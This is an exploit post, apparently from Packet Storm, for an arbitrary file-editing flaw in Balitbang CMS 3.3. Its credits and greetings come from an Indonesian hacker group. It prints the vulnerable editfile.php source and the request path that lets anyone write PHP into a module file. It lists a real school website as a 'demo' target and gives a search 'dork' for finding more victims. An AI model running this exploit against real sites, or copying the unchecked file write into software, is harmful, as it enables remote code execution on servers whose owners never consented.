Balitbang CMS version 3.3 suffers from an arbitrary file editing vulnerability that can allow a remote attacker arbitrary php code execution.
51ee4c34c19dee6c937cc60f2b6ba853b66edc84acace28c86c0de3131bf3dbc[!]===========================================================================[!]
[~] CMS Balitbang Edit File Vulnerability
[~] Author : Xr0b0t (xrt.interpol@gmx.us)
[~] Homepage : www.indonesiancoder.com | xrobot.mobi | mc-crew.net | exploit-id.com
[~] Date : 18 Mart, 2010
[~] Tested on : BlackBuntu RC2
[!]===========================================================================[!]
[ Software Information ]
[+] Vendor : kajianwebsite.org
[+] Download : http://www.kajianwebsite.org/download/CMS%20versi%203.3.zip
[+] Price : free
[+] Vulnerability : Local File Editing
[+] Dork : Xr0b0t Was Here ;)
[+] Version : version 3.3
[!]===========================================================================[!]
[ Default Site ]
http://127.0.0.1/
[ XpL ]
http://127.0.0.1/litbang//functions/editfile.php
[code]
<?php
if ($save=='simpan') {
$dwrite = fopen("../modul/tag_".$file.".php", "w");
$nfile = stripslashes($nfile);
fputs ($dwrite, $nfile);
fclose ($dwrite);
echo "File sudah disimpan....Silahkan tutup jendela ini";
//header("Location: ../admin/admin.php?mode=konf&kd=berhasil");
}
else {
$dread = file("../modul/tag_".$file.".php");
for ($i=0; $i <= count($dread); $i++) {
$output .= $dread[$i];
}
echo "<form action='editfile.php' method=post>File Name : <input type=text name=nmfile value='tag_".$file.".php'> Jarngan diganti<br><textarea name=nfile cols=80 rows=20>$output</textarea><br><input type=hidden name=file value='$file' >
<input type=submit value='Simpan' ><input type=hidden name='save' value='simpan' ></form>";
}
?>
[ Result In ]
http://127.0.0.1/litbang//modul/tag_.php
[ Demo ]
exploit : http://www.smkn3-magelang.com//functions/editfile.php
Result : http://www.smkn3-magelang.com/modul/tag_.php
etc etc etc ;]
[!]===========================================================================[!]
[ Thx TO ]
[+] Don Tukulesto DUDUl Kok G rene2... Kal0ng 666 Cepet Jadikan Ntu PRoyek
[+] INDONESIAN CODER TEAM IndonesianHacker Malang CYber CREW Magelang Cyber
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,Yur4kha,Geni212
[ NOTE ]
[+] OJOK JOTOS2an YO ..
[+] Minggir semua Arumbia Team Mau LEwat ;)
[+] MBEM : lup u :">
[ QUOTE ]
[+] INDONESIANCODER still r0x...
[+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat ..
[+] Malang Cyber Crew & Magelang Cyber Community
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed